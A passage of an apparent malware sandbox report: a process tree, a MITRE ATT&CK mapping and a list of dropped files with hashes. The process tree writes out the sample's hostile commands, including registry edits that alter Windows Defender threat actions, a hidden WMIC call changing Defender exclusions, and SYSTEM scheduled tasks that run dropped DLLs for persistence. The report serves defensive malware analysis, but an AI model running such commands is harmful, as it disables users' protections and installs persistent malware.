c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5672
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5196
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:6108
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:7076
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:7084
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:6644
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:6168
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:6908
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5244
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5828
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6684
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:7048
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:4488
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:6344
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5356
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:1092
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4504
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:6944
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:4584
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:5696
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:7164
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:6232
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:6224
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:6840
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\nQgkgv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5392
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\xPGjhGg.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6844
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7048
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:2820
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:648
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\UbvoIDg.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5652
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1672
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\fSfyYsA.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6732
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5672
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\UrOwcOm.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3552
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6812
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\tNCsCeo.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5784
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:7012
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2500

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:2284

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\DUpAnIhC\KVaaPdw.dll",#1 /XqdidJ 385118
1⤵
PID:1972
- C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\DUpAnIhC\KVaaPdw.dll",#1 /XqdidJ 385118
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Drops file in System32 directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  PID:5764
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
    3⤵
    PID:1220
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
2.0MB

MD5
786e644c23e1bf9a0d62f79067c567ee

SHA1
5fc1befc81931fada0e9a2d90bec916951657344

SHA256
c57485e201404aa00d0ba5a2166d2d5e01812b437d2e7a5e9db6515a45f03e19

SHA512
e823b8b0bb9701d81626841b4f3967f11482addde0d3e06ce50e3f81f35fe52dff9d837ce812da062007cb60390ecffb776f6814cdf2a96b506b52b65276e2df

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
476d8976aa64122d36d28b8325e7e31c

SHA1
130501daf8e55dfd84c11ab4051ff5586ea50a43

SHA256
3f854aec63374f92bea0cff43ce6c4a80edd09bfce416d7de64952067ea11271

SHA512
becbc63bcffa5bfc2ceb930e31c28f59f15b929e605e28cd4b60f995d444fb323a4d3407541e19d70b447b063880eb33e8fbf559fc94c11fbef05ce13800e842

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
30KB

MD5
dd6ac5f933b124bf8fb0a0dd7a7228c5

SHA1
f5836571af50f00ffc7902ee740fc49862dca397

SHA256
b482e1dce17a65bdc24bfafaf43a672c246b967713560fe54ef35dc16b9b6f07

SHA512
5a40da2327183926f4b1abb7bdbc9bf2389984b7d980f8e459d21d69b44cc782fe1b94b4f8c4f132afb02a2f4a68dbb5526719a25e0101b6238effa0849f0ae1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
e2a04530812c4593f858edddd00c7d74

SHA1
32edd97955cf73b7df737dddbe3c582868bb2547

SHA256
4a1cc0d8411845b353f825f29861f54c2325196950cefa04590818a7039751dc

SHA512
585043ebdb4ad9d4665f5bc17102c0f694725b09442ebbc15917820fd7988f5f3fd435307fa060aeab7c30c30cdf5a76ec8d90826607ca109237ec2b7df58bab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
e596465151d8ba9b562ce2e50364cdb1

SHA1
2724a57f74e82a2d594ad54bac470d8d7facdd42

SHA256
874b60bdd8d2d09380bca7fd2199baaa59239ae46c948e7bac0ec11da7510cf2

SHA512
fb8b8b6c47b7aa6342203630a742eb9ccf67747d08e93c9e28509ffce102d8a439192815529cde78ede6be64f1e38233bf7fd6a1378cc9ad975ce0a5ec4c47b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
75fb32838782e16fb5c814c30e277e69

SHA1
8512a3c22b51dbb5fc2a77c775e2e2cbbe0df934

SHA256
333b5df4e2e5e32327dc82dca1b7e3c54466f7e0240e624c0a6d8375edbc7289

SHA512
a2febf8c40ad86df8fe1ea3b99619d765b05b5e59e7619bcd6273ddd405feb06e8e09252e959cd0f713af4ca74cdde850c17c0166b362dc5b4369159c5ee0743

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
1a2045ef7fb4f1c3c1f210b0f3aefe2c

SHA1
81903b2176d72b32cf2c76104b74ccaf4b02a078

SHA256
a93d93b13fa7cc34aa5a3fc7a34511f9c7870188ada316d5fed565ed2e54fbbc

SHA512
984b8753705ecf7e05cbb929565af45285ea343ad94c51cbbe857f6cda06b79b6992eae58cfbea5d78df6a96165c6e2c113c51eea5a4692ec0f8d01da6675999

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
d28b2c3195f468f85074e8e4b0eef802

SHA1
fa1fca7044ba087bd7dac038b0a6c17bddf324da

SHA256
24cf511f7c70a790b84847cc54db3efea4d2809752abf63927bd690e70f14713

SHA512
734799fee535d48e00e9869867dfbb2ac43b88268bcb7bf0ad83edb296f19c9e7baef49b10c2c7466d8f5a0f67bb59ea3ed3ab9c7f9fb18240ae075dfc967796

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
c203a6ca57b3ab7f8e611a498394c388

SHA1
3729998d78f8a298417c3bcf32488ddb474d57e7

SHA256
da5cbcfb4992905f83a91df2ef6d0b64a00b5596c7bd24712db040d5b8390aee

SHA512
9731f4f80e9d4f784af93f566f8a9fc7515dba71a40f11ee70b84c5056b1b0da77b4453e3675bff14d645c17815cf9b069dd821b881fc877b58480da1acaf99d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
486fa74784d3557f265870046636a3dd

SHA1
1a36c3d7c9ac529a21e2804757180601f84a5a00

SHA256
5c611cb4cb2aeba3fdaa01962972007a12c9ea3ce88b6d5b800b9136b018fe1b

SHA512
a3758bf84a2db61d70b9abf373854448f4788612953ed0ded9a9d62afe0795dd769a31035e5ccb3e1b79b22e2c54e9614f230804e88bce9f51d20012c96ae27d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSB110.tmp\Install.exe

Filesize
6.4MB

MD5
220a02a940078153b4063f42f206087b

SHA1
02fc647d857573a253a1ab796d162244eb179315

SHA256
7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60

SHA512
42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSF30B.tmp\CastSrv.exe

Filesize
90KB

MD5
926a9def76ad857825c435eaabd4a686

SHA1
b96e9857cba9fbca67d6cb9449b2218df4488517

SHA256
77a1f38aa476f33cf8295028c24d846caa6445efd8cfca9ca85cb020085b64c3

SHA512
e53f6d5ea7fd748615f8619abb3c77f635e4f7ad52873db19449e25407300cbd660533f2b2396a759c899f2f56e45f0686c4fcd430b580979cbb3a04547dd83b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSF30B.tmp\Info.xml

Filesize
3KB

MD5
0456be6047774e5d0b8045b787048924

SHA1
76f6445368a4462a50e502bc272a8efc2eb33cb0

SHA256
1c4440a8312e16bc682277164cc6710b37fc3dcac5ef9aa0ba7e77fc0c1f4897

SHA512
c0f0cf97e0fd0b258b9a9fa6466dd9e390cd79f3edb0f5b9f10137c241c6b079061135c44c0c30dc71c28f1b7b929c65eb1112761e53cd8400d7e07ce1a7b99c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybbwoy2l.0w2.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
2KB

MD5
e0fedfc15078ba36443b634cbd01d7c5

SHA1
96f9041362101c8d83e0599e29bb8a2ee292dcd8

SHA256
8bd846ac97e9e29b20d7ea4112d85d91debb74dfcdfa0e54c41630b521fab4df

SHA512
c8c9524acb31727968fabc1e3f26ccba91bad755191eb8eaeb332000488de67c999eb704a7059ab07e3f24976d5543994e11efa3945f7a33aacd5ad62a2f6b2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
3KB

MD5
39155a640dbdb5a78554cab477b92c38

SHA1
8601729912ce52ca06c86e66c5f810cf2aabd4c1

SHA256
d2d7ec84b68008a2d63db4b19fdf7a996d11cad2876f0f469f62c048de0b7fdc

SHA512
b8b786f94d216a7a6180d6427c0b3e567cfec2dbc04784791dcf3caf9c1dca06c9f2638886b1d5d5e5f3c213083bd5910c73c74bdde04fad1b9a09273ed1f1c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1c4.0.exe

Filesize
275KB

MD5
31c1bdc2c9075e8c2eab9353c41c117f

SHA1
ab28fb009dc8c2fa244c773760109e38711b1025

SHA256
4e08b9b37494a1917d2ab809fff59b3a45673a80d25587e51c8749331bb56233

SHA512
78b995611e33b441e9ebaeecbbce3ec96bbfcac7f71bd0f639ab1e3394900be5c80893dfc8957b696609eca7ce1933d58f026c7be389795f0dcc72ad3fc35593

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1c4.1.exe

Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs.js

Filesize
7KB

MD5
e55978ca092ef38e8c4a6ac4d075b9e2

SHA1
0ddc80d7a33563e35117adeca1494593297305ef

SHA256
37e6483af35f091e102c28196fccca8539575fd17d4be07eeb7181791e4d5825

SHA512
abae07ef9b22fee2d4b73704af92ce21d4037eebd5de8d11f6d18a23cd945316e14b0f07114ce8e6aa8305f45f1a836a3bbfc74b21f3917c191f383fdf40aae3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\searchplugins\cdnsearch.xml

Filesize
1KB

MD5
2869f887319d49175ff94ec01e707508

SHA1
e9504ad5c1bcf31a2842ca2281fe993d220af4b8

SHA256
49dd61e19d4541f1e695b66847d0bf99bc08952ba41b33a69c2e297dfa282d15

SHA512
63673c1ede47fda14dea78483c6319132a849db3b35953e43704aa49cfb6d14e42d74e0eaf93f4cdb7632c85f368d484ac111687127d2b87a3e264949085c76b

Download Submit
C:\Users\Admin\Pictures\FMRHImqKyRfmTuFwEnMaRCJU.exe

Filesize
416KB

MD5
8cef32e368c0adcc2916dc3a57285802

SHA1
087e2fc9f317fe88090293c02f2595ae86e2a7a3

SHA256
2850cc08e81d0c629a1510a67f465316beeca0c86bfeeed55fc3dd333eb6fbe9

SHA512
8fae53d3a83346e1cd8152432f0caf2b00f44e4a57cf8d21c00a1637bf5334a6dc1877869d699930714e1bfd0b7d23af6ea19a47caa116fc790ece5d29ff3b5c

Download Submit
C:\Users\Admin\Pictures\dzSaCQACAjyLW3MZo75AHk4b.exe

Filesize
7KB

MD5
77f762f953163d7639dff697104e1470

SHA1
ade9fff9ffc2d587d50c636c28e4cd8dd99548d3

SHA256
d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea

SHA512
d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

Download Submit
C:\Users\Admin\Pictures\kubHbUH22R5cJMfEfeEVON21.exe

Filesize
4.2MB

MD5
5919e29493f6d033585eb0ff67870539

SHA1
ef8c183da2954e1786b17937b481649b4ad6b7ab

SHA256
e2b6cfac6fd993250d40bcd8b6883acfe0dcec844cd6ec862714abddb034cce9

SHA512
1a6d2cef09f0739ef005a3db54499fc3f9ba49f91e05f674f7838aed40f55216bb5eec471e7964f01a9b92312c30db4097b9a15cd75365d8d0a946d692aeeb3c

Download Submit
C:\Users\Admin\Pictures\oiy1vPScVPH1BoLNrDBhvei7.exe

Filesize
6.2MB

MD5
5638d57a305af6d979c2ff2f7634605a

SHA1
d411fe7f10fe6488f4bbcc52704146d124177f9b

SHA256
bc912349a4c6e0700e5709eed23eda3f1e5375c973b17de0c77a78398ca5db16

SHA512
acea97ee145a44fecd8dd403f4045ddfb1a31d1a59dc5b700d564640c4fe1fecdf7f9efdb9fb996c52e7a5957bf09e12ba2852c9abd56ff2e8382283f648a990

Download Submit
C:\Users\Admin\Pictures\wnoBQ6erADVdRUmpBaoc4kJO.exe

Filesize
4.2MB

MD5
30f2eaae092b296f0af5cea4aa2d0339

SHA1
00e078197fef66a8c8cb227d94f354a748b52f7d

SHA256
70f9d8b351abad874b31287f70e525ddc15894e2c7954a4af3e01669456a942e

SHA512
3e89a1161f168ab4afbd8d212f9bdfe4e33cb36b3eec7a5392facebb55407c6c88a4de12c5d7ef80fb731dbef26cd5c820f30b396675559d85d25b88e8495e29

Download Submit
C:\Users\Admin\Pictures\xEXmzcXoDuSVy5Lb18Lv0n45.exe

Filesize
5.5MB

MD5
5a602d800c716ecf19aece10002da470

SHA1
3f64e4b4bc5ec25730c3ed2005885438eb8666f3

SHA256
18102f6d9c390e66827e5fae3036efd613558093291e80dfe329238f8cfa4f8d

SHA512
1c453560f70fb2b6daca26350d88a432bac91cdbee92d3c97fe9b14342eca8d82a2c00cf55897ebe3bb28f7a884dba2aef0154139866b0f4a157f78a5c2d4ebb

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
c6c8aa2630a69a05d32dc88890b40f53

SHA1
c65f04b377d695d45883eec004e99008b8c99143

SHA256
cf1d3bd56cdb9be5137bf73d352cac0e2742c89978cf7147a394625583a7bcf8

SHA512
e2a445639e862fd5cfc7b214c0e3127a43be94b98c128667a0941b22c802531297f3161384d272f47ec55a7f6a14268b069ca7a856a5b2013fd5bfb5d8659b49

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
6eafee4fe86e7ed95a4dbb7036f875e8

SHA1
3e99f676de8ee768dabdce0b50311698c12ec100

SHA256
62b7dd621842ee26f65bb168f64bcc8b9257b060b6234ea529ffd766e2323451

SHA512
789b098003288d17d0d1245d9dbcfb56c453116fcf6f83f2fb385cf002bf64c682ea8075b76fc7be82a00f2d05a90e8eae4d85d635b43b3f98f1d0e76ff318b7

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
399ed468d1404874e94585cef04b9bb8

SHA1
ce328fa821d437cd4981fe59f40c4c2aeea146a9

SHA256
452e2277165de89073efea44b1fd8fa00ad5cf3a60c92856d5a3e9c10b4a204d

SHA512
